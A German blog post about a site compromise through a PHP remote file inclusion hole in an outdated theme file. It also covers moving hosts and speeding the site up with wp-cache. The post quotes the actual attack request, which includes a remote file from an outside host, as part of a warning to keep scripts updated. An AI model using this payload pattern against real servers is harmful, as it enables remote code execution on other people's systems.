“I noticed that you deactivated your IntenseDebate plugin. Is there any particular reason why? Was everything working properly? We would really appreciate any feedback on how to improve our plugin.

Kind regards,
Michael”

(Siehe auch: Tweet #1, #2)

Die betreffende Datei war Teil eines CMS-Themes und wurde zwischenzeitlich sicher von den Machern geupdatet, lag aber eben noch (eigentlich ungenutzt) in einer alten Version auf dem Server. Mit [...]/advanced2.php?pluginpath[0]=http://www.[...].net/mega/info.txt? wurde eine externe Datei eingebunden, also eine klassische PHP Remote File Include Vulnerability.
Also unbedingt dafür sorgen dass eure Scripte auf dem aktuellsten Stand sind oder ihr ungenutzte alte Sachen löscht – auch wenn das Arbeit macht – denn ihr haftet dafür was auf euren Servern passiert.

Seit heute Nachmittag liegt die Seite jetzt auf einem rootDS und immer noch webperoni, da schon gezahlte Gebühren ver- und der Umzug nicht berechnet wurden.
Nach der Optimierung des Servers und vor allem durch den Einsatz von wp-cache kommt die gesamte DTFDW-Seite jetzt wieder auf ordentliche Ladewerte:

ohne Caching braucht dieser Artikel 4,110 Sekunden zum Laden, gecached nur noch 1,703 Sekunden. Auch das Monitoring via Alertsite zeigt momentan keine Ladespitzen mehr: der Wechsel auf den rootDS hat die Response Time auf unter 5 Sekunden, der Einsatz von wp-cache auf um die 2 Sekunden gedrückt.

Caching?
Normalerweise wird beim Aufruf einer Seite der Inhalt aus einer Datenbank gelesen und die gesamte Seite dynamisch erstellt – das kostet Zeit. Nachdem eine Seite einmal aufgerufen worden ist, wird sie statisch gespeichert ( “gecached” ), beim nächsten Aufruf fallen das Abfragen der Datenbank und die dynamische Erstellung weg – ihr habt die Seite schneller auf dem Schirm.